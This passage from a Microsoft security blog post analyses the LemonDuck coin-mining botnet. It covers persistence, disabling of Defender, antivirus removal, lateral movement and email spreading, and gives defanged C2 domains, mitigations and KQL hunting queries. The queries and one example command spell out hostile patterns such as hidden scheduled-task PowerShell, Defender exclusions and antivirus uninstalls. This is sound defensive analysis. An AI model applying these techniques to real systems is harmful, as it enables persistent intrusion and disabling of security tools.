techniques](<https://www.microsoft.com/security/blog/2018/01/24/now-you-see-me-exposing-fileless-malware/#:~:text=%20These%20techniques%20include%3A%20%201%20Reflective%20DLL,provide%20powerful%20means%20for%20delivering%20memory-only...%20More%20>), which can make remediation more difficult. Fileless techniques, which include persistence via registry, scheduled tasks, WMI, and startup folder, remove the need for stable malware presence in the filesystem. These techniques also include utilizing process injection and in-memory execution, which can make removal non-trivial. It is therefore imperative that organizations that were vulnerable in the past also direct action to investigate exactly how patching occurred, and whether malicious activity persists.\n\nOn the basic side of implementation this can mean registry, scheduled task, WMI and startup folder persistence to remove the necessity for stable malware presence in the filesystem. However, many free or easily available RATs and Trojans are now routinely utilizing process injection and in-memory execution to circumvent easy removal. To rival these kinds of behaviors it\u2019s imperative that security teams within organizations review their incident response and malware removal processes to include all common areas and arenas of the operating system where malware may continue to reside after cleanup by an antivirus solution.\n\n## General, automatic behavior\n\nIf the initial execution begins automatically or from self-spreading methods, it typically originates from a file called _Readme.js_. This behavior could change over time, as the purpose of this .js file is to obfuscate and launch the PowerShell script that pulls additional scripts from the C2. This JavaScript launches a CMD process that subsequently launches Notepad as well as the PowerShell script contained within the JavaScript.\n\nIn contrast, if infection begins with RDP brute force, Exchange vulnerabilities, or other vulnerable edge systems, the first few actions are typically human-operated or originate from a hijacked process rather than from _Readme.js_. After this, the next few actions that the attackers take, including the scheduled task creation, as well as the individual components and scripts are generally the same.\n\nOne of these actions is to establish fileless persistence by creating scheduled tasks that re-run the initial PowerShell download script. This script pulls its various components from the C2s at regular intervals. The script then checks to see if any portions of the malware were removed and re-enables them. LemonDuck also maintains a backup persistence mechanism through WMI Event Consumers to perform the same actions.\n\nTo host their scripts, the attackers use multiple hosting sites, which as mentioned are resilient to takedown. They also have multiple scheduled tasks to try each site, as well as the WMI events in case other methods fail. If all of those fail, LemonDuck also uses its access methods such as RDP, Exchange web shells, Screen Connect, and RATs to maintain persistent access. These task names can vary over time, but \u201cblackball\u201d, \u201cblutea\u201d, and \u201crtsa\u201d have been persistent throughout 2020 and 2021 and are still seen in new infections as of this report.\n\nLemonDuck attempts to automatically disable Microsoft Defender for Endpoint real-time monitoring and adds whole disk drives \u2013 specifically the _C:\\_ drive \u2013 to the Microsoft Defender exclusion list. This action could in effect disable Microsoft Defender for Endpoint, freeing the attacker to perform other actions. [Tamper protection](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide>) prevents these actions, but it\u2019s important for organizations to monitor this behavior in cases where individual users set their own exclusion policy.\n\nLemonDuck then attempts to automatically remove a series of other security products through _CMD.exe_, leveraging _WMIC.exe_. The products that we have observed LemonDuck remove include ESET, Kaspersky, Avast, Norton Security, and MalwareBytes. However, they also attempt to uninstall any product with \u201cSecurity\u201d and \u201cAntiVirus\u201d in the name by running the following commands:\n\n\n\nCustom detections in Microsoft Defender for Endpoint or other security solutions can raise alerts on behaviors indicating interactions with security products that are not deployed in the environment. These alerts can allow the quick isolation of devices where this behavior is observed. While this uninstallation behavior is common in other malware, when observed in conjunction with other LemonDuck TTPs, this behavior can help validate LemonDuck infections.\n\nLemonDuck leverages a wide range of free and open-source penetration testing tools. It also uses freely available exploits and functionality such as coin mining. Because of this, the order and the number of times the next few activities are run can change. The attackers can also change the threat\u2019s presence slightly depending on the version, the method of infection, and timeframe. Many .exe and .bin files are downloaded from C2s via encoded PowerShell commands. These domains use a variety names such as the following:\n\n * ackng[.]com\n * bb3u9[.]com\n * ttr3p[.]com\n * zz3r0[.]com\n * sqlnetcat[.]com\n * netcatkit[.]com\n * hwqloan[.]com\n * 75[.]ag\n * js88[.]ag\n * qq8[.]ag\n\nIn addition to directly calling the C2s for downloads through scheduled tasks and PowerShell, LemonDuck exhibits another unique behavior: the IP addresses of a smaller subset of C2s are calculated and paired with a previously randomly generated and non-real domain name. This information is then added into the Windows Hosts file to avoid detection by static signatures. In instances where this method is seen, there is a routine to update this once every 24 hours. An example of this is below:\n\n\n\nLemonDuck is known to use custom executables and scripts. It also renames and packages well-known tools such as XMRig and Mimikatz. Of these, the three most common are the following, though other packages and binaries have been seen as well, including many with _.ori_ file extensions:\n\n * _IF.BIN _(used for lateral movement and privilege escalation)\n * _KR.BIN _(used for competition removal and host patching)\n * _M[0-9]{1}[A-Z]{1}.BIN, M6.BIN, M6.BIN.EXE, or M6G.Bin_ (used for mining)\n\nExecutables used throughout the infection also use random file names sourced from the initiating script, which selects random characters, as evident in the following code:\n\n\n\n## Lateral movement and privilege escalation\n\n_IF.Bin_, whose name stands for \u201cInfection\u201d, is the most common name used for the infection script during the download process. LemonDuck uses this script at installation and then repeatedly thereafter to attempt to scan for ports and perform network reconnaissance. It then attempts to log onto adjacent devices to push the initial LemonDuck execution scripts.\n\n_IF.Bin_ attempts to move laterally via any additional attached drives. When drives are identified, they are checked to ensure that they aren\u2019t already infected. If they aren\u2019t, a copy of _Readme.js_, as well as subcomponents of _IF.Bin_, are downloaded into the drive\u2019s home directory as hidden.\n\nSimilarly, _IF.Bin_ attempts to brute force and use vulnerabilities for SMB, SQL, and other services to move laterally. It then immediately contacts the C2 for downloads.\n\nAnother tool dropped and utilized within this lateral movement component is a bundled Mimikatz, within a _mimi.dat_ file associated with both the \u201cCat\u201d and \u201cDuck\u201d infrastructures. This tool\u2019s function is to facilitate credential theft for additional actions. In conjunction with credential theft, _IF.Bin_ drops additional .BIN files to attempt common service exploits like CVE-2017-8464 (LNK remote code execution vulnerability) to increase privilege.\n\nThe attackers regularly update the internal infection components that the malware scans for. They then attempt brute force or spray attacks, as well as exploits against available SSH, MSSQL, SMB, Exchange, RDP, REDIS and Hadoop YARN for Linux and Windows systems. A sample of ports that recent LemonDuck infections were observed querying include 70001, 8088, 16379, 6379, 22, 445, and 1433.\n\nOther functions built in and updated in this lateral movement component include mail self-spreading. This spreading functionality evaluates whether a compromised device has Outlook. If so, it accesses the mailbox and scans for all available contacts. It sends the initiating infecting file as part of a .zip, .js, or .doc/.rtf file with a static set of subjects and bodies. The mail metadata count of contacts is also sent to the attacker, likely to evaluate its effectiveness, such as in the following command:\n\n\n\n## Competition removal and host patching\n\nAt installation and repeatedly afterward, LemonDuck takes great lengths to remove all other botnets, miners, and competitor malware from the device. It does this via _KR.Bin_, the \u201cKiller\u201d script, which gets its name from its function calls. This script attempts to remove services, network connections, and other evidence from dozens of competitor malware via scheduled tasks. It also closes well-known mining ports and removes popular mining services to preserve system resources. The script even removes the mining service it intends to use and simply reinstalls it afterward with its own configuration.\n\nThis \u201cKiller\u201d script is likely a continuation of older scripts that were used by other botnets such as GhostMiner in 2018 and 2019. The older variants of the script were quite small in comparison, but they have since grown, with additional services added in 2020 and 2021. Presently, LemonDuck seems consistent in naming its variant _KR.Bin_. This process spares the scheduled tasks created by LemonDuck itself, including various PowerShell scripts as well as a task called \u201cblackball\u201d, \u201cblutea\u201d, or \u201crtsa\u201d, which has been in use by all LemonDuck\u2019s infrastructures for the last year along with other task names.\n\nThe attackers were also observed manually re-entering an environment, especially in instances where edge vulnerabilities were used as an initial entry vector. The attackers also patch the vulnerability they used to enter the network to prevent other attackers from gaining entry. As mentioned, the attackers were seen using a copy of a Microsoft-provided mitigation tool for Exchange ProxyLogon vulnerability, which they hosted on their infrastructure, to ensure other attackers don\u2019t gain web shell access the way they had. If unmonitored, this scenario could potentially lead to a situation where, if a system does not appear to be in an unpatched state, suspicious activity that occurred before patching could be ignored or thought to be unrelated to the vulnerability.\n\n## Weaponization and continued impact\n\nA miner implant is downloaded as part of the monetization mechanism of LemonDuck. The implant used is usually XMRig, which is a favorite of GhostMiner malware, the [Phorpiex botnet](<https://www.microsoft.com/security/blog/2021/05/20/phorpiex-morphs-how-a-longstanding-botnet-persists-and-thrives-in-the-current-threat-environment/>), and other malware operators. The file uses any of the following names:\n\n * _M6.bin_\n * _M6.bin.ori_\n * _M6G.bin_\n * _M6.bin.exe_\n * _<File name that follows the regex pattern M[0-9]{1}[A-Z]{1}>.BIN._\n\nOnce the automated behaviors are complete, the threat goes into a consistent check-in behavior, simply mining and reporting out to the C2 infrastructure and mining pools as needed with encoded PowerShell commands such as those below (decoded):\n\n\n\nOther systems that are affected bring in secondary payloads such as Ramnit, which is a very popular Trojan that has been seen being dropped by other malware in the past. Additional backdoors, other malware implants, and activities continuing long after initial infection, demonstrating that even a \u201csimple\u201d infection by a coin mining malware like LemonDuck can persist and bring in more dangerous threats to the enterprise.\n\n## Comprehensive protection against a wide-ranging malware operation\n\nThe cross-domain visibility and coordinated defense delivered by [Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) is designed for the wide range and increasing sophistication of threats that LemonDuck exemplifies. Below we list mitigation actions, detection information, and advanced hunting queries that Microsoft 365 Defender customers can use to harden networks against threats from LemonDuck and other malware operations.\n\n### Mitigations\n\nApply these mitigations to reduce the impact of LemonDuck. Check the recommendations card for the deployment status of monitored mitigations.\n\n * Prevent threats from arriving via removable storage devices by blocking these devices on sensitive endpoints. If you allow removable storage devices, you can minimize the risk by turning off autorun, enabling real-time antivirus protection, and blocking untrusted content. [Learn about stopping threats from USB devices and other removable media](<https://docs.microsoft.com/windows/security/threat-protection/device-control/control-usb-devices-using-intune>).\n * Ensure that Linux and Windows devices are included in routine patching, and validate protection against the CVE-2019-0708, CVE-2017-0144, CVE-2017-8464, CVE-2020-0796, CVE-2021-26855, CVE-2021-26858, and CVE-2021-27065 vulnerabilities, as well as against brute-force attacks in popular services like SMB, SSH, RDP, SQL, and others.\n * [Turn on PUA protection](<https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/detect-block-potentially-unwanted-apps-windows-defender-antivirus>). Potentially unwanted applications (PUA) can negatively impact machine performance and employee productivity. In enterprise environments, PUA protection can stop adware, torrent downloaders, and coin miners.\n * Turn on [tamper protection features](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-antivirus/prevent-changes-to-security-settings-with-tamper-protection>)to prevent attackers from stopping security services.\n * Turn on [cloud-delivered protection](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-antivirus/enable-cloud-protection-microsoft-defender-antivirus>)and automatic sample submission on Microsoft Defender Antivirus. These capabilities use artificial intelligence and machine learning to quickly identify and stop new and unknown threats.\n * Encourage users to use Microsoft Edge and other web browsers that support SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that contain exploits and host malware. [Turn on network protection](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/enable-network-protection>)to block connections to malicious domains and IP addresses.\n * Check your [Office 365 antispam policy](<https://docs.microsoft.com/microsoft-365/security/office-365-security/configure-your-spam-filter-policies>)and your [mail flow rules](<https://docs.microsoft.com/microsoft-365/security/office-365-security/create-safe-sender-lists-in-office-365#recommended-use-mail-flow-rules>) for allowed senders, domains and IP addresses. [Apply extra caution](<https://docs.microsoft.com/exchange/troubleshoot/antispam/cautions-against-bypassing-spam-filters>) when using these settings to bypass antispam filters, even if the allowed sender addresses are associated with trusted organizations\u2014Office 365 will honor these settings and can let potentially harmful messages pass through. [Review system overrides in threat explorer](<https://docs.microsoft.com/microsoft-365/security/office-365-security/threat-explorer#system-overrides>) to determine why attack messages have reached recipient mailboxes.\n\n### Attack surface reduction\n\nTurn on the following attack surface reduction rules, to block or audit activity associated with this threat:\n\n * [Block executable content from email client and webmail](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-executable-content-from-email-client-and-webmail>)\n * [Block JavaScript or VBScript from launching downloaded executable content](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-javascript-or-vbscript-from-launching-downloaded-executable-content>)\n * [Block Office applications from creating executable content](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-office-applications-from-creating-executable-content>)\n * [Block all office applications from creating child processes](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-all-office-applications-from-creating-child-processes>)\n * [Block executable files from running unless they meet a prevalence, age, or trusted list criterion](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-executable-files-from-running-unless-they-meet-a-prevalence-age-or-trusted-list-criterion>)\n * [Block execution of potentially obfuscated scripts](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-execution-of-potentially-obfuscated-scripts>)\n * [Block persistence through WMI event subscription](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-persistence-through-wmi-event-subscription>)\n * [Block process creations originating from PSExec and WMI commands](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-process-creations-originating-from-psexec-and-wmi-commands>)\n\n### Antivirus detections\n\nMicrosoft Defender Antivirus detects threat components as the following malware:\n\n * TrojanDownloader:PowerShell/LemonDuck!MSR\n * TrojanDownloader:Linux/LemonDuck.G!MSR\n * Trojan:Win32/LemonDuck.A\n * Trojan:PowerShell/LemonDuck.A\n * Trojan:PowerShell/LemonDuck.B\n * Trojan:PowerShell/LemonDuck.C\n * Trojan:PowerShell/LemonDuck.D\n * Trojan:PowerShell/LemonDuck.E\n * Trojan:PowerShell/LemonDuck.F\n * Trojan:PowerShell/LemonDuck.G\n * TrojanDownloader:PowerShell/LodPey.A\n * TrojanDownloader:PowerShell/LodPey.B\n * Trojan:PowerShell/Amynex.A\n * Trojan:Win32/Amynex.A\n\n### Endpoint detection and response (EDR) alerts\n\nAlerts with the following titles in the security center can indicate threat activity on your network:\n\n * LemonDuck botnet C2 domain activity\n * LemonDuck malware\n\nThe following alerts might also indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.\n\n * Suspicious PowerShell command line\n * Suspicious remote activity\n * Suspicious service registration\n * Suspicious Security Software Discovery\n * Suspicious System Network Configuration Discovery\n * Suspicious sequence of exploration activities\n * Suspicious Process Discovery\n * Suspicious System Owner/User Discovery\n * Suspicious System Network Connections Discovery\n * Suspicious Task Scheduler activity\n * Suspicious Microsoft Defender Antivirus exclusion\n * Suspicious behavior by cmd.exe was observed\n * Suspicious remote PowerShell execution\n * Suspicious behavior by svchost.exe was observed\n * A WMI event filter was bound to a suspicious event consumer\n * Attempt to hide use of dual-purpose tool\n * System executable renamed and launched\n * Microsoft Defender Antivirus protection turned off\n * Anomaly detected in ASEP registry\n * A script with suspicious content was observed\n * An obfuscated command line sequence was identified\n * A process was injected with potentially malicious code\n * A malicious PowerShell Cmdlet was invoked on the machine\n * Suspected credential theft activity\n * Outbound connection to non-standard port\n * Sensitive credential memory read\n\n### Advanced hunting\n\nThe LemonDuck botnet is highly varied in its payloads and delivery methods after email distribution so can sometimes evade alerts. You can use the advanced hunting capability in Microsoft 365 Defender and Microsoft Defender for Endpoint to surface activities associated with this threat.\n\n**NOTE:** The following sample queries lets you search for a week's worth of events. To explore up to 30 days worth of raw data to inspect events in your network and locate potential Lemon Duck-related indicators for more than a week, go to the **Advanced Hunting** page > **Query** tab, select the calendar drop-down menu to update your query to hunt for the **Last 30 days**.\n\n**LemonDuck template subject lines**\n\nLooks for subject lines that are present from 2020 to 2021 in dropped scripts that attach malicious LemonDuck samples to emails and mail it to contacts of the mailboxes on impacted machines. Additionally, checks if Attachments are present in the mailbox. General attachment types to check for at present are .DOC, .ZIP or .JS, though this could be subject to change as well as the subjects themselves. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAG2RQUvDQBCF31nwP-ytCnroUUElxEoEUUirxWOiXRuNicSkpeCP99vJepESZnYz8-a9mdmZPlWoUq2ZNlqpUa9vHepAP3Laak2sw5zmGlTqnfsLGEdNgz_SRAtDOc4OTM-fUyuPT_WgJ93qWqea6gzsCfY_6mBKqdiYypcpVHRVRxVPzmmpjLqRIVOiO_Qy4gk8gW1ONtezzo0_x-7JOcvleiQfasNkE7gWuolcS_otbKI-zuHRH_QR82-ot3olXmpHfox6asJetlhtndbcer6wrxFTcmvhWdmmvG35rz7srGLTLvodyAF82FyHWmC5Ane89y0SUyroc837ja-WGkNjk1zqAj_VLyyp2szeAQAA&runQuery=true&timeRangeId=week>)\n\n`EmailEvents \n| where Subject in ('The Truth of COVID-19','COVID-19 nCov Special info WHO','HALTH ADVISORY:CORONA VIRUS', \n'WTF','What the fcuk','good bye','farewell letter','broken file','This is your order?') \n| where AttachmentCount >= 1`\n\n**LemonDuck Botnet Registration Functions**\n\nLooks for instances of function runs with name \u201cSIEX\u201d, which within the Lemon Duck initializing scripts is used to assign a specific user-agent for reporting back to command-and-control infrastructure with. This query should be accompanied by additional surrounding logs showing successful downloads from component sites. [Run query in Microsfot 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAG2PuwrCQBRETy34D4ufIViID7ATYmFhE9yAAV9oMIgm3-7ZLQRBhvtgmJm7O6fiQc3euXCrONNwZ8iAN4GWg9zNCkxVNWovajY8uWZ2IgIj1vJt1hbZcxQzuZModUQ1_1OjqL_Jpb6le0qIviRd6O3pxoud_Tc1MePcC1b-YZv3zvoA7T5fgtwAAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceEvents \n| where ActionType == \"PowerShellCommand\" \n| where AdditionalFields =~ \"{\\\"Command\\\":\\\"SIEX\\\"}\"`\n\n**LemonDuck keyword identification**\n\nLooks for simple usage of LemonDuck seen keyword variations initiated by PowerShell processes. All results should reflect Lemon_Duck behavior, however there are existing variants of Lemon_Duck that might not use this term explicitly, so validate with additional hunting queries based on known TTPs. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAJ2NQQrCMBBF_1rwDqErBfEGrqyCUKQ3kKLFBpsojdoKHt7nbESX8pnM8P7MT65ad3nt6aU6nW1KaAWvFXVlHmukp5x6NbCOctrgeVyvyt6o40_CGtoyb9kIdrNATpkubPWWlCyxRXP6QGV__rZkDqjCO6iwnfdlA0naGX9oQn4BD2xHaK4bCSfo7Mv58Klezaq6iiQBAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName == \"powershell.exe\" \n| where InitiatingProcessCommandLine has_any(\"Lemon_Duck\",\"LemonDuck\")`\n\n**LemonDuck Microsoft Defender tampering**\n\nLooks for a command line event where LemonDuck or other like malware might attempt to modify Defender by disabling real-time monitoring functionality or adding entire drive letters to the exclusion criteria. The exclusion additions will often succeed even if tamper protection is enabled due to the design of the application. Custom alerts could be created in an environment for particular drive letters common in the environment. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAKWRzQqCQBSFzzroHcRVgT1EpIugIKp9mFoappL9LXr4vhkNrJUQl5m53jPnnOsdX4nuyhRxrnRRabOaCKgnKnQldzTUQC_Oh1KqF5ajOWgGnim0e6Hjj8aM_EyEYLEW9o5hplRq7dhzwtFIrjYgV020VGVVEh1ap8LqufK46cpHpYa5h5lozTIqxv9MvsSx6aqE2_T0YU7pIe7hEOjJd64bPpnV-_4rV-PORCqLncAiXJ1eE_D-mJ7h-p1Xm4OZ2radQI1aSFbpDTwRAUzcAQAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessCommandLine has_all (\"Set-MpPreference\", \"DisableRealtimeMonitoring\", \"Add-MpPreference\", \"ExclusionProcess\") \n| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Antivirus uninstallation attempts**\n\nLooks for a command line event where LemonDuck or other similar malware might attempt to modify Defender by disabling real-time monitoring functionality or adding entire drive letters to the exclusion criteria. The exclusion additions will often succeed even if tamper protection is enabled due to the design of the application. Custom alerts could be created in an environment for particular drive letters common in the environment. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEALWQzUrEQBCE6yz4DiEnF0SfwIP4A6IsguBVQja4wyaTMBN_FsRn97M2u6LeBBl6plPdVV2dczV6VlDNe6uk3lnmXIA3ihrJ97WnNxV60RIsEYWuqAWqQZXvqMcfCpegLfmcjs6cE71zl-h0nnkE-kqUf5xwRt5xKmoL3bjnk7kEyXrgbjkH6A_mLfQEd_w2p9QhEXceW1RWO7yeNAqY0foZ_gbbdByD9a6MVqw8IfjvlZr922ZRa292bWSwdrbz9eSswkNlv1_fw5Rn-mp2SvaxZTTGt_2n3inonkj05gmf4y1R6akXuvulNNMH1HgRaFYCAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName =~ \"wmic.exe\" \n| where InitiatingProcessCommandLine has_all(\"product where\",\"name like\",\"call uninstall\",\"/nointeractive\") \n| where InitiatingProcessCommandLine has_any(\"Kaspersky\",\"avast\",\"avp\",\"security\",\"eset\",\"AntiVirus\",\"Norton Security\")`\n\n**Known LemonDuck component script installations**\n\nLooks for instances of the callback actions which attempt to obfuscate detection while downloading supporting scripts such as those that enable the \u201cKiller\u201d and \u201cInfection\u201d functions for the malware as well as the mining components and potential secondary functions. Options for more specific instances included to account for environments with potential false positives. Most general versions are intended to account for minor script or component changes such as changing to utilize non .bin files, and non-common components. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAN2QzWrCUBCFz1roO1xctSC60p2rVlEQ8Q0kJrYJJlGS-Ac-vN8dA9rgwm3LMHcm58zPmXxprYMShcSFCm0tK7ER-Fq5KvI3tXSR01ExWIE7TeES2ESBvbl-GhPGoCn5nIrMenyV07va2lF3tFmlzUyxLvGEt9XBQ3qiB-zjqYpXdHySZ1gAF2lmNb43Bim15PXbvaoePQ4uhNuSVcw513oiU5xTvwdNNaxxr7LfqEmJAV-RaQpq9qZjR3_Fjoltj-0yB1Pw-gv__j2e62pluu7X_Z_bNsy83-eRRN8NJNPg1z-4At8RQUloAwAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName in (\"powershell.exe\",\"cmd.exe\") \n| where InitiatingProcessCommandLine has_all(\"/c echo try\",\"down_url=\",\"md5\",\"downloaddata\",\"ComputeHash\") or \nInitiatingProcessCommandLine has_all(\"/c echo try\",\"down_url=\",\"md5\",\"downloaddata\",\"ComputeHash\",\".bin\") or \nInitiatingProcessCommandLine has_all(\"/c echo try\",\"down_url=\",\"md5\",\"downloaddata\",\"ComputeHash\",\"kr.bin\",\"if.bin\",\"m6.bin\")`\n\n**LemonDuck named scheduled creation**\n\nLooks for instances of the LemonDuck creates statically named scheduled tasks or a semi-unique pattern of task creation LemonDuck also utilizes launching hidden PowerShell processes in conjunction with randomly generated task names. An example of a randomly generated one is: "schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn fs5yDs9ArkV\\2IVLzNXfZV/F /tr "powershell -w hidden -c PS_CMD". [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAKWS0WrCQBBF77PgPyx5UrD6BX3S-mRLwQ8o2ygoGpXdtGlB_PaenSQlFV-kLLO53Jmde3eyM631qa1yvq8KOhqKrCf4tQ4qwX31dJZTpQ1cIJzmnNqDXuRVGPOoC3tGfU5dCR-1I8Zkv4jsZp-_qlNwwfIor7RA42BVG-s2oMeE2nTSo5B6Dv_d9c3476Z7CXZ6526e8zuQB-_Jja7yH-bAX2WCTcybM4duYE8O73WUNG_dt9YKqNc44jxarvjNpj_Q4gKlrsMWzztsaPCJ2spmGG2WyYPTA1xytsXpyt5E4nKb8hKvUz1rZvf9AWK9PVhOAgAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where FileName =~ \"schtasks.exe\" \n| where ProcessCommandLine has(\"/create\") \n| where ProcessCommandLine has_any(\"/tn blackball\",\"/tn blutea\",\"/tn rtsa\") or \nProcessCommandLine has_all(\"/create\",\"/ru\",\"system\",\"/sc\",\"/mo\",\"/tn\",\"/F\",\"/tr\",\"powershell -w hidden -c PS_CMD\")`\n\n**Competition killer script scheduled task execution**\n\nLooks for instances of the LemonDuck component KR.Bin, which is intended to kill competition prior to making the installation and persistence of the malware concrete. The killer script used is based off historical versions from 2018 and earlier, which has grown over time to include scheduled task and service names of various botnets, malware, and other competing services. The version currently in use by LemonDuck has approximately 40-60 scheduled task names. The upper maximum in this query can be modified and adjusted to include time bounding. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAJWRT0_CQBDF35nE79D0BAkRDhw4oBeqCQbUxD_XBguxhlpMW8EaP7y_HQppiATMZmZnZt_MvLwNNNdKb4q475VpaVHOuaI-V6qC-EwN_cjTWjG1DPP20EPid86UjpnGTEwNFVPJFeITTlM-WUS1sPoCOwf3hflqYx0FxAlW1GqPut3F1_jWjlGuz2pvxs5v2-myBVHIq5vTPIlri84XlfigpskIxHaX41mYJrMKteX5zMTEmLj9F5jjk-FLWCTW8woyhsuGU3gip7-U_8-E-g-ksHE_MOHOyTeKPtDnuJZVfme8I2Pt6YZ4hXl60gdzp7V_WaKyf4DjYXUuTZ-euqbSMS0Hhu6D_gUG3Q8GqgIAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where ProcessCommandLine has_all(\"schtasks.exe\",\"/Delete\",\"/TN\",\"/F\") \n| summarize make_set(ProcessCommandLine) by DeviceId \n| extend DeleteVolume = array_length(set_ProcessCommandLine) \n| where set_ProcessCommandLine has_any(\"Mysa\",\"Sorry\",\"Oracle Java Update\",\"ok\") where DeleteVolume >= 40 and DeleteVolume <= 80`\n\n**LemonDuck hosts file adjustment for dynamic C2 downloads**\n\nLooks for a PowerShell event wherein LemonDuck will attempt to simultaneously retrieve the IP address of a C2 and modify the hosts file with the retrieved address. The address is then attributed to a name that does not exist and is randomly generated. The script then instructs the machine to download data from the address. This query has a more general and more specific version, allowing the detection of this technique if other activity groups were to utilize it. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAMWQuwrCYAyFzyz4DqWTgvgGDmK9gYigu5S22IK20op18OH9Erro4OAiIZc_OTknbaRMdxVKyDvVqrxqsDn9TKVu1H319FSgVjm9Gg-0ZlYwLRR7LHX6YFjQPVNvQVx8Z4IFCnUF1TpT44xnbEx-4OGPajPqCxYzS7VxjG3mdBodiaYygH9J_6YV-IY8BZ26irFYDDXCDZN0dd5hbTaE0y6s2PnHXWv432cHNvZs1J3-9_vtHfn_L9Gt0E952_Wxf90Lt1_r6hICAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName == \"powershell.exe\" \n| where InitiatingProcessCommandLine has_all(\"GetHostAddresses\",\"etc\",\"hosts\") \nor InitiatingProcessCommandLine has_all(\"GetHostAddresses\",\"IPAddressToString\",\"etc\",\"hosts\",\"DownloadData\")`\n\n \n\n[Learn how your organization can stop attacks through automated, cross-domain security and built-in AI with Microsoft Defender 365](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>).\n\n \n\nThe post [When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-29T19:00:59", "type": "mssecure", "title": "When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144", "CVE-2017-8464", "CVE-2019-0708", "CVE-2020-0796", "CVE-2021-26855", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-07-29T19:00:59", "id": "MSSECURE:4A6B394DCAF12E05136AE087248E228C", "href": "https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-30T00:08:30", "description": "_[Note: In this two-part blog series, we expose a modern malware infrastructure and provide guidance for protecting against the wide range of threats it enables. Part 1 covers the evolution of the threat, how it spreads, and how it impacts organizations. [Part 2](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>) is a deep dive on the attacker behavior and will provide investigation guidance.] _\n\nCombating and preventing today's threats to enterprises require comprehensive protection focused on addressing the full scope and impact of attacks. Anything that can gain access to machines\u2014even so-called commodity malware\u2014can bring in more dangerous threats. We\u2019ve seen this in banking Trojans serving as entry point for ransomware and hands-on-keyboard attacks. LemonDuck, an actively updated and robust malware that\u2019s primarily known for its botnet and cryptocurrency mining 